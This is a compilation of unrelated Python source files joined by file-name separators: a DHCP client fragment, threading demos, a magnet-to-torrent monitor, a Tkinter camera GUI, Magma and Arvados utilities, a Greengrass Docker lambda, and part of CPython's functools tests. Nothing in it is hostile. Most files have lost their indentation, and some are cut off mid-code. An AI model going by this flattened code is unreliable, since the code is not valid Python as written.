getAck, getIp, finish = start_process(mac)
if finish:
sys.exit()
# timer_thread = threading.Thread(target=lease_expire())
# timer_thread.start()
if dis_time <= 0:
rand = random.uniform(1, 200) / 200
print(rand)
print("Discovery timer finish..Go to begin timer again")
if getAck == False:
print("Get ip Not OK..Try again")
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
elif getIp == True:
if expire == True:
print("IP expired")
expire = False
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
else:
while expire == False:
pass
# print("wait for IP to expire")
expire = False
if prv_dis >= BACKOFF_CUTOFF:
dis_time = BACKOFF_CUTOFF
print("Next discovery time {}".format(dis_time))
else:
generate = prv_dis * 2 * rand
print(generate)
dis_time = math.floor(generate)
print("Next discovery time {}".format(dis_time))
prv_dis = dis_time
getIp = False
getAck = False
|
mtsleepD.py
|
#!/usr/bin/env python3
import threading
from time import sleep, ctime
loops = [4, 2]
class ThreadFunc(object):
def __init__(self, func, args, name=''):
        self.name = name
self.func = func
self.args = args
def __call__(self):
self.func(*self.args)
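# ThreadFunc bundles a function with its arguments so that the Thread target
# becomes a zero-argument callable; the equivalent stdlib idiom would simply
# be threading.Thread(target=func, args=args).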
def loop(nloop, nsec):
print('start loop', nloop, 'at:', ctime())
sleep(nsec)
print('loop', nloop, 'done at:', ctime())
def main():
print('starting at:', ctime())
threads = []
nloops = range(len(loops))
for i in nloops:
t = threading.Thread(target=ThreadFunc(loop, (i, loops[i]), loop.__name__))
threads.append(t)
for i in nloops:
threads[i].start()
for i in nloops:
threads[i].join()
print('all DONE at:', ctime())
if __name__ == '__main__':
main()
|
main.py
|
import os
import atexit
from pathlib import Path
from argparse import ArgumentParser
import shutil
import sys
import threading
import logging
import coloredlogs
import requests
from decouple import config
from cachetools import cached, TTLCache
from filesystem.folderwatcher import folderwatcher
from filesystem.FileSystemHandler import FileSystemHandler
from torrents.trackers import TrackerManager
from torrents.clients import InternalClient, TransmissionClient
from web import start
import web
class Monitor:
def __init__(self):
self.logger= logging.getLogger('Monitor worker')
uid = os.getuid()
self.logger.debug('Running as uid: {0}'.format(uid))
folder_watch= config('magnet_watch')
        # Make sure we have read permissions to the watch folder
        if not os.access(folder_watch, os.R_OK):
            self.logger.error("Watch directory: '{0}' doesn't exist or isn't readable by user {1}".format(folder_watch, uid))
            sys.exit("Unable to read: '{0}'".format(folder_watch))
else:
self.logger.debug("Watch directory: '{0}' is readable".format(folder_watch))
torrent_blackhole= config('torrent_blackhole',default=folder_watch)
        # Make sure we have write permissions to the blackhole folder
        if not os.access(torrent_blackhole, os.W_OK):
            self.logger.error("Blackhole: '{0}' doesn't exist or isn't writeable by user {1}".format(torrent_blackhole, uid))
            sys.exit("Unable to read/write to: '{0}'".format(torrent_blackhole))
else:
self.logger.debug("Blackhole directory: '{0}' is writeable ".format(torrent_blackhole))
@cached(cache=TTLCache(maxsize=500,ttl=86400))
def load_trackers(self):
trackers_from = config('trackers','https://raw.githubusercontent.com/ngosang/trackerslist/master/trackers_all.txt')
trackers = requests.get(trackers_from).content.decode('utf8').split('\n\n')[:-1]
self.logger.info('{0} trackers loaded.'.format(len(trackers)))
return trackers
def start(self):
parser = ArgumentParser(description='A tool to convert magnet links to .torrent files')
        monitorparser = parser.add_argument_group('Watch folder for magnet files and convert them to torrents')
monitorparser.add_argument('--monitor',default=True,action='store_true')
magnetparser= parser.add_argument_group('Process single magnet file')
magnetparser.add_argument('-m','--magnet', help='The magnet url')
magnetparser.add_argument('-o','--output', help='The output torrent file name')
args = vars(parser.parse_known_args()[0])
output = None
if args['output'] is not None:
output = args['output']
if len(sys.argv) == 1:
self.logger.warning('No arguments passed, defaulting to monitor mode')
args['monitor']='monitor'
client= InternalClient(self.logger,self.load_trackers())
if args['monitor'] is not None and args['monitor']=='monitor':
self.logger.info('Starting monitor mode')
folder_watch=config('magnet_watch')
self.logger.info('Blackhole folder: {0}'.format(os.path.abspath(folder_watch)))
output=config('torrent_blackhole',default=folder_watch)
self.logger.info('Processing existing files: {0}'.format(os.path.abspath(folder_watch)))
magnets=Path(folder_watch).glob('*.magnet')
for magnet in magnets:
self.logger.info('Processing file: {0}'.format(os.path.basename(magnet)))
magnet_contents=Path(magnet).read_text()
self.logger.debug('Loading magnet: {0}'.format(magnet.name))
torrent_path=client.magnet2torrent(magnet_contents,output)
magnet_processed=str(os.path.abspath(magnet))
if torrent_path is not None:
magnet_processed +='.processed'
else:
magnet_processed +='.err'
shutil.move(magnet,magnet_processed)
folder_watcher = folderwatcher(folder_watch,FileSystemHandler(client))
folder_watcher.start()
elif args['magnet'] is not None:
client.magnet2torrent(args['magnet'], output)
def main():
# set thread name
threading.current_thread().name = 'MAIN'
logger = logging.getLogger('MAIN')
coloredlogs.install(level=config('log_level',default='debug'),fmt='[%(asctime)s] %(name)s[%(process)d]: %(message)s')
    logger.info('Starting program')
global APP
try:
logger.info('Setting log level: {0}'.format(config('log_level',default='debug')))
webserver=threading.Thread(target= web.start, daemon=True)
webserver.name='Web'
webserver.start()
if not config('transmission_host',default='') == '':
client=TransmissionClient(config('transmission_host'),config('transmission_user',default=''),config('transmission_password',default=''),config('transmission_port',default=9091))
tmanager=TrackerManager(client=client,interval=config('tracker_sync_interval',default=30*3600))
trackerthread=threading.Thread(target=tmanager.start, daemon=True)
trackerthread.name= 'Tracker Manager'
trackerthread.start()
APP=Monitor()
# APP.start()
appthread=threading.Thread(target=APP.start, daemon=True)
appthread.name= 'Monitor'
appthread.start()
        logger.info('Thread loading completed')
        logger.info('Program started')
        appthread.join()
except SystemExit as sysex:
logger.error('Critical error: {0}'.format(sysex))
except KeyboardInterrupt as kex:
logger.error('Keyboard interrupt: {0}'.format(kex))
if __name__ == '__main__':
main()
@atexit.register
def _exithandler():
logging.getLogger('MAIN').error('Program shutting down')
|
GUI.py
|
import Tkinter as Tk
from Video_Process import *
from threading import Thread
class GUI:
def __init__(self):
# Main windows of the app
self.root = Tk.Tk()
self.root.title("Selfie Camera")
self.root.geometry("1156x620")
self.video_processor = VideoProcess()
self.video_processor.parent = self
self.create_left_frame()
self.create_right_frame()
# Output photo count
self.photo_count = 0
self.root.mainloop()
# Left video frame initialization
def create_left_frame(self):
# Left panel of photo and snap button
frame_left = Tk.Frame(self.root)
        # Label to display the video feed from the camera
self.video = Tk.Label(frame_left, width=1024, height=576)
# Start the speech recognition and video thread separately
camera_module = Thread(target=self.video_processor.show_frame)
speech_module = Thread(target=self.video_processor.speech_module.speech_rec)
camera_module.start()
# Set speech recognition thread to daemon so that exit callback can work
speech_module.daemon = True
speech_module.start()
self.video.pack()
# Take picture button
Tk.Button(frame_left, text='TAKE PICTURE', command=self.snap_call).pack(ipady=10, ipadx=465, expand=True)
frame_left.pack(side=Tk.LEFT, fill=Tk.BOTH)
# Right function frame initialization
def create_right_frame(self):
# Right panel of control functions
frame_right = Tk.Frame(self.root)
# Zoom functions button
Tk.Label(frame_right, text="ZOOM").pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='+', command=self.zoom1_callback).pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='-', command=self.zoom2_callback).pack(fill=Tk.X, ipady=10)
# Blur functions
Tk.Label(frame_right, text="BLUR").pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='+', command=self.blur1_callback).pack(fill=Tk.X, ipady=10)
Tk.Button(frame_right, text='-', command=self.blur2_callback).pack(fill=Tk.X, ipady=10)
# Brightness control
self.gain = Tk.IntVar()
Tk.Label(frame_right, text='BRIGHTNESS').pack(fill=Tk.X, ipady=10)
Tk.Scale(frame_right, orient=Tk.HORIZONTAL, variable=self.gain, from_=-50, to=50).pack(fill=Tk.X)
# Filter control buttons
Tk.Button(frame_right, text="Country", command=self.country_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Desert", command=self.desert_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Lumo", command=self.lumo_callback).pack(fill=Tk.X, ipady=13)
Tk.Button(frame_right, text="Nashville", command=self.nashville_callback).pack(fill=Tk.X, ipady=13)
# Speech recognition enable
self.speech_button = Tk.Button(frame_right, text="Voice Enable", command=self.speech_enable_callback)
self.speech_button.pack(fill=Tk.X, ipady=13)
# Exit button
Tk.Button(frame_right, text="Exit", command=self.exit_callback).pack(fill=Tk.X, ipady=13)
frame_right.pack(side=Tk.LEFT, fill=Tk.BOTH, expand=True)
# snap button
def snap_call(self):
file_name = 'photo_' + str(self.photo_count) + '.jpg'
self.photo_count = self.photo_count + 1
img = np.array(self.video_processor.img_f)
cv2.imwrite(file_name, cv2.cvtColor(img,cv2.COLOR_RGBA2BGRA))
# Zoom in callback
def zoom1_callback(self):
if self.video_processor.ratio < 2:
self.video_processor.ratio += 0.1
# Zoom out callback
def zoom2_callback(self):
if self.video_processor.ratio > 1:
self.video_processor.ratio -= 0.1
# Blur callback
def blur1_callback(self):
if self.video_processor.blur < 9:
self.video_processor.blur += 2
# Reduce blur callback
def blur2_callback(self):
if self.video_processor.blur > 3:
self.video_processor.blur -= 2
# Filter callback functions
def country_callback(self):
if self.video_processor.do_filter == 1:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 1
def desert_callback(self):
if self.video_processor.do_filter == 2:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 2
def lumo_callback(self):
if self.video_processor.do_filter == 3:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 3
def nashville_callback(self):
if self.video_processor.do_filter == 4:
self.video_processor.do_filter = 0
else:
self.video_processor.do_filter = 4
# Speech recognition enable callback
def speech_enable_callback(self):
self.video_processor.speech_enable = not self.video_processor.speech_enable
if self.video_processor.speech_enable:
self.speech_button.config(text="Voice Disable")
else:
self.speech_button.config(text="Voice Enable")
# Exit callback
def exit_callback(self):
exit(1)
def get_video(self):
return self.video
if __name__ == '__main__':
Gui = GUI()
|
start_pipelined.py
|
"""
Copyright (c) 2018-present, Facebook, Inc.
All rights reserved.
This source code is licensed under the BSD-style license found in the
LICENSE file in the root directory of this source tree. An additional grant
of patent rights can be found in the PATENTS file in the same directory.
"""
import logging
import threading
import subprocess
from enum import Enum
from collections import namedtuple
from concurrent.futures import Future
from magma.pipelined.rule_mappers import RuleIDToNumMapper
from magma.pipelined.app.base import MagmaController, ControllerType
from magma.pipelined.tests.app.exceptions import ServiceRunningError,\
BadConfigError
from ryu.base.app_manager import AppManager
from ryu.lib import hub
class TestSetup(object):
"""
The TestSetup class variables
apps: [Controller]: ryu apps to instantiate
references: [Controller]: futures to get references of
instantiated apps
config: dict: config for ryu app
mconfig: dict: mconfig for ryu app
service_manager: ServiceManager: service manager for ryu app
integ_test: bool: set true when running tests in
integ setting
"""
def __init__(self, apps, references, config, mconfig, loop,
service_manager, integ_test=False, rpc_stubs=None):
self.apps = apps
self.references = references
self.config = config
self.mconfig = mconfig
self.service_manager = service_manager
self.loop = loop
self.integ_test = integ_test
if rpc_stubs is None:
rpc_stubs = {}
self.rpc_stubs = rpc_stubs
Controller = namedtuple('Controller', ['name', 'app_future'])
class PipelinedController(Enum):
InOut = Controller(
'magma.pipelined.app.inout', 'inout'
)
Arp = Controller(
'magma.pipelined.app.arp', 'arpd'
)
Enforcement = Controller(
'magma.pipelined.app.enforcement', 'enforcement'
)
Enforcement_stats = Controller(
'magma.pipelined.app.enforcement_stats', 'enforcement_stats'
)
Testing = Controller(
'magma.pipelined.app.testing', 'testing'
)
Meter = Controller(
'magma.pipelined.app.meter', 'meter'
)
MeterStats = Controller(
'magma.pipelined.app.meter_stats', 'meter_stats'
)
AccessControl = Controller(
'magma.pipelined.app.access_control', 'access_control'
)
Subscriber = Controller(
'magma.pipelined.app.subscriber', 'subscriber'
)
UEMac = Controller(
'magma.pipelined.app.ue_mac', 'ue_mac'
)
TunnelLearnController = Controller(
'magma.pipelined.app.tunnel_learn', 'tunnel_learn'
)
PacketTracer = Controller(
'magma.pipelined.app.packet_tracer', 'packet_tracer'
)
def assert_pipelined_not_running():
"""
    As Ryu applications shouldn't be started if the magma@pipelined service is
    running, we need to verify whether pipelined is active. If the service is
    running, this throws a ServiceRunningError exception.
    This can be done using the command:
        systemctl is-active magma@pipelined
    If pipelined is inactive, this exits with code 3 and prints "inactive".
"""
try:
output = subprocess.check_output(
["systemctl", "is-active", "magma@pipelined"]
)
except subprocess.CalledProcessError as e:
if "inactive" not in str(e.output, 'utf-8'):
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"caused an error code %d, exception - %s"
% (e.returncode, str(e.output, 'utf-8').strip())
)
else:
raise ServiceRunningError(
"Pipelined is running, 'systemctl is-active magma@pipelined'" +
"output - %s" % str(output, 'utf-8').strip()
)
class StartThread(object):
"""
Starts ryu applications
    Uses the ryu hub and ryu app_manager to launch ryu applications. Futures
    are used to obtain references to the instantiated apps, which allows
    unit tests to call methods on pipelined apps.
"""
_Event = namedtuple('_Event', ['func', 'future'])
def __init__(self, test_setup, launch_successful_future):
""" If verification fails throw an exception, don't start ryu apps """
if test_setup.integ_test is False:
hub.patch(thread=True)
assert_pipelined_not_running()
self._test_setup = test_setup
self.keep_running = True
self.done = False
self.event_queue = hub.Queue()
thread = threading.Thread(
target=self.start_ryu_apps, args=(launch_successful_future,))
thread.daemon = True
thread.start()
def start_ryu_apps(self, launch_successful_future):
"""
Starts up ryu applications, all the configuration is parsed from the
test_setup config provided in the unit test.
If apps throw an exception on launch, error is passed in the
launch_successful_future and will prevent infinitely waiting.
"""
self.reset_static_vars()
hub.spawn(self._process_queue)
app_lists = [a.value.name for a in self._test_setup.apps]
app_futures = {
controller.value.app_future: future
for (controller, future) in self._test_setup.references.items()
}
manager = AppManager.get_instance()
manager.load_apps(app_lists)
contexts = manager.create_contexts()
contexts['sids_by_ip'] = {} # shared by both metering apps
contexts['rule_id_mapper'] = RuleIDToNumMapper()
contexts['session_rule_version_mapper'] = \
self._test_setup.service_manager.session_rule_version_mapper
contexts['app_futures'] = app_futures
contexts['config'] = self._test_setup.config
contexts['mconfig'] = self._test_setup.mconfig
contexts['loop'] = self._test_setup.loop
contexts['rpc_stubs'] = self._test_setup.rpc_stubs
contexts['service_manager'] = self._test_setup.service_manager
logging.basicConfig(
level=logging.INFO,
format='[%(asctime)s %(levelname)s %(name)s] %(message)s')
services = []
try:
services.extend(manager.instantiate_apps(**contexts))
except Exception as e:
launch_successful_future.set_result(
"Ryu apps launch exception: {}".format(e))
raise
launch_successful_future.set_result("Setup successful")
self.run(manager)
def _process_queue(self):
"""
Run a queue to process external events that need to be run in the Ryu
greenthread
"""
while self.keep_running:
try:
event = self.event_queue.get(block=False)
val = event.func()
event.future.set_result(val)
except hub.QueueEmpty:
pass
finally:
hub.sleep(0.1)
def run_in_greenthread(self, func):
"""
When not monkey patching (i.e. when running a gRPC server), you cannot
call directly into a Ryu app. To do this, there needs to be a boundary
between futures and hub.Queues. When this function is called, a lambda
is passed which is sent into a queue to be run by the Ryu greenthread.
"""
ev = self._Event(func=func, future=Future())
self.event_queue.put(ev)
return ev.future.result()
def run(self, manager):
""" Keep running until signalled from test file """
while self.keep_running:
hub.sleep(1)
manager.close()
self.done = True
def reset_static_vars(self):
""" Reset static vars for running nosetests """
AppManager._instance = AppManager()
MagmaController.TABLES = {}
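# A hedged usage sketch for unit tests (app choices, config values, and the
# service_manager/some_app names are illustrative placeholders):
#
#   from concurrent.futures import Future
#   launch_future = Future()
#   setup = TestSetup(apps=[PipelinedController.InOut],
#                     references={PipelinedController.InOut: Future()},
#                     config={}, mconfig={}, loop=None,
#                     service_manager=service_manager)
#   starter = StartThread(setup, launch_future)
#   assert launch_future.result() == 'Setup successful'
#   result = starter.run_in_greenthread(lambda: some_app.some_method())
#   starter.keep_running = False  # signal shutdown from the test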
|
reader.py
|
from __future__ import print_function
import arvados
import Queue
import threading
import _strptime
from crunchstat_summary import logger
class CollectionReader(object):
def __init__(self, collection_id):
logger.debug('load collection %s', collection_id)
collection = arvados.collection.CollectionReader(collection_id)
filenames = [filename for filename in collection]
if len(filenames) != 1:
raise ValueError(
"collection {} has {} files; need exactly one".format(
collection_id, len(filenames)))
self._reader = collection.open(filenames[0])
self._label = "{}/{}".format(collection_id, filenames[0])
def __str__(self):
return self._label
def __iter__(self):
return iter(self._reader)
class LiveLogReader(object):
EOF = None
def __init__(self, job_uuid):
logger.debug('load stderr events for job %s', job_uuid)
self.job_uuid = job_uuid
def __str__(self):
return self.job_uuid
def _get_all_pages(self):
got = 0
last_id = 0
filters = [
['object_uuid', '=', self.job_uuid],
['event_type', '=', 'stderr']]
try:
while True:
page = arvados.api().logs().index(
limit=1000,
order=['id asc'],
filters=filters + [['id','>',str(last_id)]],
select=['id', 'properties'],
).execute(num_retries=2)
got += len(page['items'])
logger.debug(
'%s: received %d of %d log events',
self.job_uuid, got,
got + page['items_available'] - len(page['items']))
for i in page['items']:
for line in i['properties']['text'].split('\n'):
self._queue.put(line+'\n')
last_id = i['id']
if (len(page['items']) == 0 or
len(page['items']) >= page['items_available']):
break
finally:
self._queue.put(self.EOF)
def __iter__(self):
self._queue = Queue.Queue()
self._thread = threading.Thread(target=self._get_all_pages)
self._thread.daemon = True
self._thread.start()
return self
def next(self):
line = self._queue.get()
if line is self.EOF:
self._thread.join()
raise StopIteration
return line
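# A short usage sketch (the job UUID is a placeholder); iterating starts a
# daemon thread that pages through the job's stderr log events:
#
#   reader = LiveLogReader('zzzzz-8i9sb-xxxxxxxxxxxxxxx')
#   for line in reader:
#       process(line)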
|
DockerPython.py
|
# DockerPython.py
# Demonstrates an alternative to CDDDockerJava for managing docker containers
# See README.md
import json
import logging
import os
import platform
import docker
import threading
import greengrasssdk
import boto3
import base64
# main is located at the bottom of this file
# Create a greengrass core sdk client
ggc_client = greengrasssdk.client('iot-data')
# create client for interacting with docker
# additional options may be needed if networking containers
docker_client = docker.from_env()
# Retrieving platform information to send from Greengrass Core
my_platform = platform.platform()
# Logging setup
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
streamHandler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
streamHandler.setFormatter(formatter)
logger.addHandler(streamHandler)
# get environmental variables
GROUP_ID = os.environ['GROUP_ID']
THING_NAME = os.environ['AWS_IOT_THING_NAME']
THING_ARN = os.environ['AWS_IOT_THING_ARN']
# initialize generic response
payload = {}
payload['group_id'] = GROUP_ID
payload['thing_name'] = THING_NAME
payload['thing_arn'] = THING_ARN
# setup OUTBOUND topics
base_docker_topic = THING_NAME +'/docker'
info_topic = base_docker_topic + '/info'
log_topic = base_docker_topic + '/logs'
# publishes info json to the THING_NAME/docker/info topic
# for general information from the lambda
def send_info(payload_json):
ggc_client.publish(topic=info_topic, payload=json.dumps(payload_json).encode())
# publishes log json to the THING_NAME/docker/log topic
# ONLY for logs from docker containers
def send_log(payload_json):
ggc_client.publish(topic=log_topic, payload=json.dumps(payload_json).encode())
# Kill and remove all running containers upon lambda startup
def kill_all_containers():
all_containers = docker_client.containers.list()
for container in all_containers:
kill_msg = {"message":"Killing and removing container: " + container.name}
send_info(kill_msg)
container.stop()
container.remove()
survival_msg = {"message":"Containers surviving: " + str(docker_client.containers.list())}
send_info(survival_msg)
# Clears all current containers and updates them to match
# the docker_config
def update_containers(docker_config):
send_info({"message":"updating containers..."})
kill_all_containers()
for image_info in docker_config['image_config_list']:
process_image_info(image_info)
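# For reference, a docker_config of the shape consumed above; the field names
# are taken from the accessors in this file, the values are illustrative:
#
#   {
#     "image_config_list": [
#       {
#         "image_name": "alpine:latest",
#         "use_local": False,
#         "num_containers": 1,
#         "docker_run_args": {"detach": True},
#         "timeout": 60,
#         "status": "red"
#       }
#     ]
#   }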
# Work on a single image definition, ie one entry in image_config_list
def process_image_info(image_info):
send_info({"message":"Working on image " + image_info['image_name'] + "."})
update_status_of_container(image_info['image_name'], "yellow")
if not image_info['use_local']:
pull_image(image_info['image_name'])
run_containers(image_info)
# pull a single image from dockerhub using its string name
# TODO: ECR integration
def pull_image(image_name):
send_info({"message":"Pulling container: " + image_name})
docker_client.images.pull(image_name)
send_info({"message":"Pulled container: " + image_name})
# Run an arbitrary number of containers from the same image
# According to additional options supplied by the image_info
# dictionary.
def run_containers(image_info):
# pull information from the image_info object
num_containers = image_info['num_containers']
image_name = image_info['image_name']
docker_run_args = image_info['docker_run_args']
image_time_out = image_info['timeout']
send_info({'message':'With image '+image_name+', running '+str(num_containers)+' containers.'})
# repeat for multiple containers according to the info above
for i in range(num_containers):
# use the docker_run_args specified in the image_info as docker run's kwargs
container = docker_client.containers.run(image_name, **docker_run_args)
send_info({"message":"Running container with name: " + container.name + " and timeout " + str(image_time_out)})
# Spawn a logger_timer thread. note that this in turn will spawn its own thread,
# this is the only way I could think of doing this without extending the scope
# of the thread information
t = threading.Thread(target=logger_timer, args=(container, image_name, image_time_out,))
update_status_of_container(image_name, "green")
t.start()
# Spawns a log_stream_worker thread on container
# that is terminated after timeout
def logger_timer(container, image_name, time_out):
stopevent = threading.Event()
testthread = threading.Thread(target=log_stream_worker, args=(container, image_name, stopevent))
testthread.start()
# Join the thread after the timeout
# regardless of exit status
testthread.join(timeout=time_out)
# toggle the event so the thread will stop
# otherwise the thread would continue
stopevent.set()
update_status_of_container(image_name, "red")
send_info({"message":"Container "+ container.name + " has stopped (whether by timeout or error)"})
container.stop()
return
# Continually read and publish the logs of a container
def log_stream_worker(container, image_name, stopevent):
    # initialize the log payload
container_payload = {}
container_payload['thing_name'] = THING_NAME
container_payload['container_name'] = container.name
container_payload['container_output'] = ""
container_payload['container_image'] = image_name
# stream the container logs
# note this for loop does not terminate unless the stopevent is set
for line in container.logs(stream=True):
container_payload['container_output'] += line.decode()
if "\n" in line.decode():
container_payload['container_output'] = container_payload['container_output'].strip()
send_log(container_payload)
container_payload['container_output'] = ""
        if stopevent.is_set():
return
def convert_keys_to_string(dictionary):
"""Recursively converts dictionary keys to strings."""
if not isinstance(dictionary, dict):
return dictionary
return dict((str(k), convert_keys_to_string(v))
for k, v in dictionary.items())
# Set the status of the container in the shadow to "green" (currently running), "yellow" (starting up), or red (not running due to shut-down, pre-initialization or error)
def update_status_of_container(image_name, status):
my_shadow = json.loads(ggc_client.get_thing_shadow(thingName=THING_NAME)['payload'])
my_reported_shadow = my_shadow["state"]['reported']
for container in my_reported_shadow['docker_config']['image_config_list']:
if image_name == container["image_name"]:
container['status'] = status
reported_state = {
"state": {
"desired": json.loads(convert_keys_to_string(json.dumps(my_reported_shadow))),
"reported": json.loads(convert_keys_to_string(json.dumps(my_reported_shadow)))
}
}
print(reported_state)
update_my_shadow(reported_state)
send_info({"my_shadow":reported_state})
return
return "ERROR - Docker image with that name was not deployed"
# update the shadow of this AWS Thing
def update_my_shadow(json_payload):
ggc_client.update_thing_shadow(thingName=THING_NAME, payload=json.dumps(json_payload).encode())
# Takes a desired state, updates containers, and reports new state
def update_to_desired_state(desired_state):
# if no config present, no updates needed, at least not on our end
if 'docker_config' not in desired_state:
return
desired_config = desired_state['docker_config']
    # report the desired state as the new reported state, then update the
    # containers; if update_containers() crashes the runtime, the shadow will
    # already have been updated to the desired state
reported_state = {
"state": {
"reported": desired_state
}
}
update_my_shadow(reported_state)
update_containers(desired_config)
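# An illustrative delta event of the shape handled here, as delivered on the
# shadow delta topic (values are placeholders):
#
#   {"state": {"docker_config": {"image_config_list": [...]}}}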
# Executed upon startup of GG daemon or upon deployment of this lambda
# note: this is not the only entry point, the function_handler below
# is invoked upon shadow delta update
def main():
send_info({"message":"Lambda starting. Executing main..."})
ecr_cli = boto3.client('ecr', region_name='us-east-1')
token = ecr_cli.get_authorization_token()
username, password = base64.b64decode(token['authorizationData'][0]['authorizationToken']).decode().split(':')
registry = token['authorizationData'][0]['proxyEndpoint']
docker_client.login(username, password, registry=registry)
    try:
        my_shadow = json.loads(ggc_client.get_thing_shadow(thingName=THING_NAME)['payload'].decode())
    except Exception:
        send_info({"message": "No shadow was created! Automatically generating empty shadow"})
        my_shadow = {
            "state": {
                "desired": {"welcome": "AWS-Test"},
                "reported": {"welcome": "AWS-Test"},
            }
        }
        update_my_shadow(my_shadow)
send_info({"my_shadow":my_shadow})
if 'desired' in my_shadow['state']:
desired_state = my_shadow['state']['desired']
update_to_desired_state(desired_state)
# invoke main
main()
# handler for updates on the topic
# $aws/things/${AWS_IOT_THING_NAME}/shadow/update/delta
# which means it will be invoked whenever the shadow is changed
# "event" parameter is a description of the delta
def function_handler(event, context):
send_info({"message":"Handling delta..."})
# if no state info present, nothing we can do
if 'state' not in event:
return
# the delta channel spits back the desired state
# if desired and reported states differ
desired_state = event['state']
update_to_desired_state(desired_state)
return
|
test_functools.py
|
import abc
import builtins
import collections
import collections.abc
import copy
from itertools import permutations
import pickle
from random import choice
import sys
from test import support
import threading
import time
import typing
import unittest
import unittest.mock
from weakref import proxy
import contextlib
import functools
py_functools = support.import_fresh_module('functools', blocked=['_functools'])
c_functools = support.import_fresh_module('functools', fresh=['_functools'])
decimal = support.import_fresh_module('decimal', fresh=['_decimal'])
@contextlib.contextmanager
def replaced_module(name, replacement):
original_module = sys.modules[name]
sys.modules[name] = replacement
try:
yield
finally:
sys.modules[name] = original_module
def capture(*args, **kw):
"""capture all positional and keyword arguments"""
return args, kw
def signature(part):
""" return the signature of a partial object """
return (part.func, part.args, part.keywords, part.__dict__)
class MyTuple(tuple):
pass
class BadTuple(tuple):
def __add__(self, other):
return list(self) + list(other)
class MyDict(dict):
pass
class TestPartial:
def test_basic_examples(self):
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertTrue(callable(p))
self.assertEqual(p(3, 4, b=30, c=40),
((1, 2, 3, 4), dict(a=10, b=30, c=40)))
p = self.partial(map, lambda x: x*10)
self.assertEqual(list(p([1,2,3,4])), [10, 20, 30, 40])
def test_attributes(self):
p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
